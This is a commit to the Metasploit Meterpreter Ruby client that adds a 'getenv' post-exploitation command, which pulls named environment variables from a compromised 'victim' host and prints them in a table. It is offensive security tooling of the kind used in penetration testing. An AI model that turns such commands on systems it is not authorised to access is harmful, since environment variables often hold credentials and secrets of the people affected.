Add the getenv command which pulls env vars from the victim

This command will allow the attacker to grab environment variables from the
target, if they exist. Calling this function allows for one or more values
to be passed in, which should match the name of the variable required. If
the variable is found, it is returned. If it is not found, the variable
is not returned (ie. it's not present in the resulting hash).

Note 1: POSIX environment vars are case-senstive, whereas Windows is not.
Note 2: POSIX doesn't seem to cough up user environment vars, it only returns
system vars. I'm not sure why this is, but it could be because of the way
we do linking on POSIX.

lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb

@@ -33,6 +33,29 @@ class Config
     return client.unicode_filter_encode( response.get_tlv_value(TLV_TYPE_USER_NAME) )
   end
 
+  #
+  # Returns a hash of requested environment variables, along with their values.
+  # If a requested value doesn't exist in the response, then the value wasn't found.
+  #
+  def getenv(var_names)
+    request = Packet.create_request('stdapi_sys_config_getenv')
+
+    var_names.each do |v|
+      request.add_tlv(TLV_TYPE_ENV_VARIABLE, v)
+    end
+
+    response = client.send_request(request)
+    result = {}
+
+    response.each(TLV_TYPE_ENV_GROUP) do |env|
+      var_name = env.get_tlv_value(TLV_TYPE_ENV_VARIABLE)
+      var_value = env.get_tlv_value(TLV_TYPE_ENV_VALUE)
+      result[var_name] = var_value
+    end
+
+    return result
+  end
+
   #
   # Returns a hash of information about the remote computer.
   #

lib/rex/post/meterpreter/extensions/stdapi/tlv.rb

@@ -117,6 +117,11 @@ TLV_TYPE_USER_NAME          = TLV_META_TYPE_STRING  | 1042
 TLV_TYPE_ARCHITECTURE       = TLV_META_TYPE_STRING  | 1043
 TLV_TYPE_LANG_SYSTEM        = TLV_META_TYPE_STRING  | 1044
 
+# Environment
+TLV_TYPE_ENV_VARIABLE       = TLV_META_TYPE_STRING  | 1100
+TLV_TYPE_ENV_VALUE          = TLV_META_TYPE_STRING  | 1101
+TLV_TYPE_ENV_GROUP          = TLV_META_TYPE_GROUP   | 1102
+
 DELETE_KEY_FLAG_RECURSIVE   = (1 << 0)
 
 # Process

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb

@@ -88,6 +88,7 @@ class Console::CommandDispatcher::Stdapi::Sys
       "getpid"      => "Get the current process identifier",
       "getprivs"    => "Attempt to enable all privileges available to the current process",
       "getuid"      => "Get the user that the server is running as",
+      "getenv"      => "Get one or more environment variable values",
       "kill"        => "Terminate a process",
       "ps"          => "List running processes",
       "reboot"      => "Reboots the remote computer",
@@ -106,6 +107,7 @@ class Console::CommandDispatcher::Stdapi::Sys
       "getpid"      => [ "stdapi_sys_process_getpid"  ],
       "getprivs"    => [ "stdapi_sys_config_getprivs" ],
       "getuid"      => [ "stdapi_sys_config_getuid" ],
+      "getenv"      => [ "stdapi_sys_config_getenv" ],
       "kill"        => [ "stdapi_sys_process_kill" ],
       "ps"          => [ "stdapi_sys_process_get_processes" ],
       "reboot"      => [ "stdapi_sys_power_exitwindows" ],
@@ -277,6 +279,30 @@ class Console::CommandDispatcher::Stdapi::Sys
     print_line("Server username: #{client.sys.config.getuid}")
   end
 
+  def cmd_getenv(*args)
+    vars = client.sys.config.getenv(args)
+
+    if vars.length == 0
+      print_error("None of the specified environment variables were found/set.")
+    else
+      table = Rex::Ui::Text::Table.new(
+        'Header'    => 'Environment Variables',
+        'Indent'    => 0,
+        'SortIndex' => 1,
+        'Columns'   => [
+          'Variable', 'Value'
+        ]
+      )
+
+      vars.each do |var, val|
+        table << [ var, val ]
+      end
+
+      print_line
+      print_line(table.to_s)
+    end
+  end
+
   #
   # Clears the event log
   #